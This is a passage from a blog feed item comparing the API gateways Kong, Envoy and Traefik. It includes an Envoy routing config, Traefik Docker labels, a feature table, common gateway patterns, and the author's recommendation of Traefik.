          &lt;span class="na"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;8080&lt;/span&gt;
      &lt;span class="na"&gt;filter_chains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.network.http_connection_manager&lt;/span&gt;
              &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager&lt;/span&gt;
                &lt;span class="s"&gt;stat_prefix&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ingress&lt;/span&gt;
                &lt;span class="s"&gt;route_config&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
                  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;local_route&lt;/span&gt;
                  &lt;span class="na"&gt;virtual_hosts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
                      &lt;span class="na"&gt;domains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;api.example.com"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
                      &lt;span class="na"&gt;routes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;match&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;prefix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/api/users"&lt;/span&gt;
                          &lt;span class="na"&gt;route&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-service&lt;/span&gt;
                        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;match&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;prefix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/api/orders"&lt;/span&gt;
                          &lt;span class="na"&gt;route&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;order-service&lt;/span&gt;
                            &lt;span class="na"&gt;retry_policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                              &lt;span class="na"&gt;retry_on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;5xx"&lt;/span&gt;
                              &lt;span class="na"&gt;num_retries&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
              &lt;span class="err"&gt;  &lt;/span&gt;&lt;span class="na"&gt;http_filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.http.router&lt;/span&gt;
                    &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/envoy.extensions.filters.http.router.v3.Router&lt;/span&gt;

  &lt;span class="na"&gt;clusters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-service&lt;/span&gt;
      &lt;span class="na"&gt;connect_timeout&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;5s&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STRICT_DNS&lt;/span&gt;
      &lt;span class="na"&gt;load_assignment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;cluster_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-service&lt;/span&gt;
        &lt;span class="na"&gt;endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;lb_endpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;endpoint&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                  &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                    &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-api&lt;/span&gt;
                      &lt;span class="na"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3000&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Traefik: The Docker-Native Gateway
&lt;/h3&gt;

&lt;p&gt;Traefik auto-discovers services from Docker, Kubernetes, and other providers. No config files needed — just labels.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Service with Traefik labels&lt;/span&gt;
&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;user-api&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-api:latest&lt;/span&gt;
    &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.enable=true"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.routers.user-api.rule=Host(`api.example.com`)&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;PathPrefix(`/api/users`)"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.routers.user-api.entrypoints=web"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.services.user-api.loadbalancer.server.port=3000"&lt;/span&gt;
      &lt;span class="c1"&gt;# Rate limiting middleware&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.middlewares.user-ratelimit.ratelimit.average=100"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.middlewares.user-ratelimit.ratelimit.burst=50"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;traefik.http.routers.user-api.middlewares=user-ratelimit"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Feature Comparison
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Kong&lt;/th&gt;
&lt;th&gt;Envoy&lt;/th&gt;
&lt;th&gt;Traefik&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Config method&lt;/td&gt;
&lt;td&gt;Admin API / DB&lt;/td&gt;
&lt;td&gt;YAML / xDS API&lt;/td&gt;
&lt;td&gt;Docker labels / YAML&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Service discovery&lt;/td&gt;
&lt;td&gt;DNS, Consul&lt;/td&gt;
&lt;td&gt;DNS, EDS&lt;/td&gt;
&lt;td&gt;Docker, K8s, Consul&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rate limiting&lt;/td&gt;
&lt;td&gt;Plugin (built-in)&lt;/td&gt;
&lt;td&gt;Filter (built-in)&lt;/td&gt;
&lt;td&gt;Middleware (built-in)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authentication&lt;/td&gt;
&lt;td&gt;JWT, OAuth2, LDAP, mTLS&lt;/td&gt;
&lt;td&gt;JWT, ext_authz&lt;/td&gt;
&lt;td&gt;ForwardAuth, BasicAuth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Load balancing&lt;/td&gt;
&lt;td&gt;Round-robin, hash, least-conn&lt;/td&gt;
&lt;td&gt;6+ algorithms&lt;/td&gt;
&lt;td&gt;Round-robin, WRR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Circuit breaking&lt;/td&gt;
&lt;td&gt;Plugin&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WebSocket&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;gRPC&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WASM extensibility&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Plugin ecosystem&lt;/td&gt;
&lt;td&gt;100+ plugins&lt;/td&gt;
&lt;td&gt;WASM + Lua filters&lt;/td&gt;
&lt;td&gt;Middlewares + plugins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory footprint&lt;/td&gt;
&lt;td&gt;~200MB (+DB)&lt;/td&gt;
&lt;td&gt;~50MB&lt;/td&gt;
&lt;td&gt;~30MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Config complexity&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dashboard&lt;/td&gt;
&lt;td&gt;Kong Manager (paid)&lt;/td&gt;
&lt;td&gt;No (use Kiali)&lt;/td&gt;
&lt;td&gt;Built-in (free)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Internet🌐ReverseProxyTLS terminationLoad balancingPath routingRate limitingapp.example.comapi.example.comcdn.example.comHTTPS:3000:8080:9000&lt;/p&gt;
&lt;p&gt;A reverse proxy terminates TLS, routes requests by hostname, and load-balances across backend services.&lt;/p&gt;

&lt;h2&gt;
  
  
  API Gateway Patterns
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Pattern 1: Backend for Frontend (BFF)
&lt;/h3&gt;

&lt;p&gt;Route different clients to different backend compositions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Mobile App  → /mobile/*  → Mobile BFF → [User, Order, Payment]
Web App     → /web/*     → Web BFF    → [User, Order, Catalog]
Admin Panel → /admin/*   → Admin BFF  → [User, Analytics, Config]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Pattern 2: API Versioning
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/api/v1/users → user-service-v1 (weight: 100%)
/api/v2/users → user-service-v2 (weight: 100%)
/api/v3/users → user-service-v2 (weight: 90%) + user-service-v3 (weight: 10%)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Pattern 3: Rate Limiting Tiers
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Free tier:     100 requests/minute
Pro tier:      1,000 requests/minute
Enterprise:    10,000 requests/minute
Internal:      No limit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Pattern 4: Request Transformation
&lt;/h3&gt;

&lt;p&gt;Transform requests before they hit your services:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Client sends:  GET /api/users/123
Gateway adds:  X-Request-ID, X-Correlation-ID headers
Gateway strips: Cookie, Authorization (after auth check)
Backend gets:  Clean request with validated context
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;API GatewayAuthServiceUserServiceOrderServicePaymentServiceMessage Bus / Events&lt;/p&gt;
&lt;p&gt;Microservices architecture: independent services communicate through an API gateway and event bus.&lt;/p&gt;

&lt;h2&gt;
  
  
  Our Recommendation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Choose Kong when&lt;/strong&gt;: You need a full API management platform with a plugin ecosystem, have a dedicated API team, need advanced auth (OAuth2 flows, LDAP), or want a commercial support option.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Envoy when&lt;/strong&gt;: You need maximum performance and programmability, are building a service mesh, need WASM extensibility, or are running at very high scale (100K+ RPS).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Traefik when&lt;/strong&gt;: You run Docker or Kubernetes, want zero-config service discovery, prefer simplicity over features, or are a small-to-medium team without dedicated API infrastructure engineers.&lt;/p&gt;

&lt;p&gt;At TechSaaS, we use Traefik for everything. It handles our 50+ services with Docker label discovery, and the 30MB memory footprint means it barely registers on our resource monitoring. For most teams, Traefik's simplicity and Docker integration beats the feature richness of Kong or Envoy.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
  </channel>
</rss>
